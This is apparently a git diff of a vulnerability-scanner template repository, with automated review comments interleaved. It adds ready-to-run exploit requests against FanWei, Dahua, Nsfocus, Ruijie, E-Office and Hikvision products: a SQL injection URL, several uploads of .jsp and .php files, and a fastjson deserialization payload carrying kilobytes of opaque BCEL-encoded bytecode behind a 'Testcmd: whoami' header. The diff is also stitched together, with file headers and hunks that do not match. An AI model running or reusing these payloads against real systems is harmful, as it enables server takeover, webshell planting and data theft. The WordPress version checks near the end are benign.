@@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 78d89c1465..1af31ba824 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml 
@@ -1,29 +1,43 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" +http: + - raw: + - | + POST /publishing/publishing/material/file/video HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 804 + Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 + Accept-Encoding: gzip, deflate + Connection: close + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" -http: - - method: GET - path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + Test + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Submit" - matchers-condition: and + submit + --dd8f988919484abab3816881c55272a7-- + + req-condition: true matchers: - - type: word - part: body - words: - - "c4ca" + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "success")' + - 'contains(body_1, "path")' + condition: and - - 
type: status - status: - - 500 +# /publishingImg/VIDEO/230812152005170200.jsp diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml 
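Review bot: The new request writes an executable file to the target (`filename="Test.jsp"`) and nothing in the template removes it afterwards, so every scan leaves a server-side artifact behind; the Nsfocus, Ruijie and E-Office hunks below do the same with `compose.php`, `111.php`/`test.php` and `a.php4`. Templates of this kind should carry the `intrusive` tag and say so in `description:` so operators know the check performs a write rather than a probe and that cleanup has to be done by hand. The trailing `+# /publishingImg/VIDEO/230812152005170200.jsp` line looks like a path copied from the author's own test run; either drop it or replace it with a comment that states what it is for.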
@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index 1cd783867f..a8f9cbe173 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml 
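Review bot: The `driverClassName` value is several kilobytes of opaque `$$BCEL$$`-encoded bytecode with no source, build recipe, hash or reference attached, so a maintainer cannot verify what that class does before this template is executed — that is a supply-chain risk for everyone who runs the repository, and the class source (or at minimum its origin and a hash) should be committed alongside the template. Separately, `name:` was cut down to just `HIKVISION` while the description says command execution and the file still sits at `poc/upload/Hikvision_iVMS-8700_upload_action.yaml`, so the title, the path and the content now describe three different things, and the previous upload PoC disappears from this path instead of a new file being added; a descriptive title such as `name: HIKVISION Comprehensive Security Management Platform applyCT Command Execution` and a matching filename would keep both findings traceable.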
@@ -1,28 +1,59 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability + name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in + Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets metadata: - fofa-query: body="'/needUsbkey.php?username='" - hunter-query: web.body="'/needUsbkey.php?username='" + fofa-query: app="NSFOCUS-下一代防火墙" + hunter-query: web.title="用户认证 - NSFOCUS NF" + http: - - method: GET - path: - - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + - raw: + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 238 + Accept-Encoding: gzip, deflate + Connection: close + + --1d52ba2a11ad8a915eddab1a0e85acd9 + Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" + + lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; + --1d52ba2a11ad8a915eddab1a0e85acd9-- + + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 217 + Accept-Encoding: gzip, deflate + Connection: close + + 
--4803b59d015026999b45993b1245f0ef + Content-Disposition: form-data; name="file"; filename="compose.php" + + + --4803b59d015026999b45993b1245f0ef-- + + - | + GET /mail/include/header_main.php HTTP/1.1 + Host: {{Host}}:4433 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - matchers-condition: and matchers: - - type: word - part: body - words: - - "nologin" - - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1, 'upload file success')" + - "status_code_2 == 200 && contains(body_2, 'upload file success')" + - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" + condition: and diff --git a/poc/upload/Ruijie_NBR_Router_fileupload.yaml b/poc/upload/Ruijie_NBR_Router_fileupload.yaml index f2db119795..fa762ac2f6 100644 --- a/poc/upload/Ruijie_NBR_Router_fileupload.yaml +++ b/poc/upload/Ruijie_NBR_Router_fileupload.yaml 
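Review bot: The identifiers in this template disagree about the product: `name:` says NF Next Generation Firewall, `description:` says SSL VPN, `id: Green-Alliance` is carried over from the fortress-machine template this file replaces, and the path says `Nsfocus_NF_Firewall_FileUpload.yaml`. Pick one product name and use it consistently in `id`, `name` and `description` so a hit can be matched to the right asset. `severity` is raised from medium to high with no `reference:` to back it; add the advisory link that justifies the rating.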
@@ -1,33 +1,37 @@ id: Ruijie info: - name: Ruijie Switch WEB Management System EXCU_ SHELL + name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie Switch WEB Management System EXCU_ SHELL + Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges metadata: - fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" - hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" + fofa-query: app="Ruijie-NBR路由器" + hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" http: - raw: - | - GET /EXCU_SHELL HTTP/1.1 + POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Cmdnum: '1' - Command1: show running-config - Confirm1: n + Accept: text/plain, */*; q=0.01 + Content-Disposition: form-data; name="file"; filename="111.php" + Content-Type: image/jpeg + + - | + GET /321/test.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "configuration")' + - 'status_code_2 == 200' + - 'contains(body_1, "test.php")' + - 'contains(body_2, "PHP Version")' condition: and diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index 8c93d2bd55..aa02a4941d 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml 
@@ -1,39 +1,52 @@ id: FanWei info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: fofa-query: app="泛微-EOffice" hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream - + + ------WebKitFormBoundaryakbyiukl-- - --e64bdf16c554bbc109cecef6451c26a4-- + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + 
regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' - condition: and - -# /attachment/3466744850/xxx.php + - body_2 == str2 + +# http://your-ip/attachment/回显的那串数字/a.php4 diff --git a/poc/wordpress/leopard-wordpress-offload-media.yaml b/poc/wordpress/leopard-wordpress-offload-media.yaml new file mode 100644 index 0000000000..bc3b3821d7 --- /dev/null +++ b/poc/wordpress/leopard-wordpress-offload-media.yaml @@ -0,0 +1,59 @@ +id: leopard-wordpress-offload-media + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/00aba7b3-4d4a-4aba-8e4e-2e8a928f6143?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/wordpress/wp-travel-blocks.yaml b/poc/wordpress/wp-travel-blocks.yaml new file mode 100644 index 0000000000..0addc83668 
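Review bot: `variables:` declares `str1` and `str2`, but only `str2` is referenced in the template (`body_2 == str2`), so `str1` is dead and should be removed. The trailing `# http://your-ip/attachment/回显的那串数字/a.php4` comment is in Chinese with a `your-ip` placeholder while the rest of the file is English; write it in English to match the template or drop it.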
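Review bot: `description: >` is empty and `classification` has `cvss-metrics:`, `cvss-score:` and `cve-id:` all blank, while `tags:` still claims `cve` and `shodan-query: 'vuln:'` is an unfilled placeholder; the same scaffold repeats in the wp-travel-blocks and wptelegram-widget hunks that follow. Either fill these from the linked Wordfence entry or drop the empty keys and the `cve` tag, so consumers that filter on `cve` or parse `cvss-score` do not receive empty values. The two `version` extractors are identical apart from `internal: true`; a one-line comment such as `# second extractor repeats the first so the version is also reported in output` would stop the next reader from assuming a copy-paste mistake.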
--- /dev/null
+++ b/poc/wordpress/wp-travel-blocks.yaml
@@ -0,0 +1,59 @@
+id: wp-travel-blocks
+
+info:
+ name: >
+ WP Travel Gutenberg Blocks <= 3.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/55fd9ca6-fe57-490d-bfde-492957035311?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-travel-blocks/"
+ google-query: inurl:"/wp-content/plugins/wp-travel-blocks/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-travel-blocks,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-travel-blocks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-travel-blocks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.5.1')
\ No newline at end of file
diff --git a/poc/wordpress/wptelegram-widget.yaml b/poc/wordpress/wptelegram-widget.yaml
new file mode 100644
index 0000000000..48f2ae9337
--- /dev/null
+++ b/poc/wordpress/wptelegram-widget.yaml
@@ -0,0 +1,59 @@
+id: wptelegram-widget
+
+info:
+ name: >
+ WP Telegram Widget and Join Link <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff77089-c6c9-49af-8b08-0977a526fa23?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
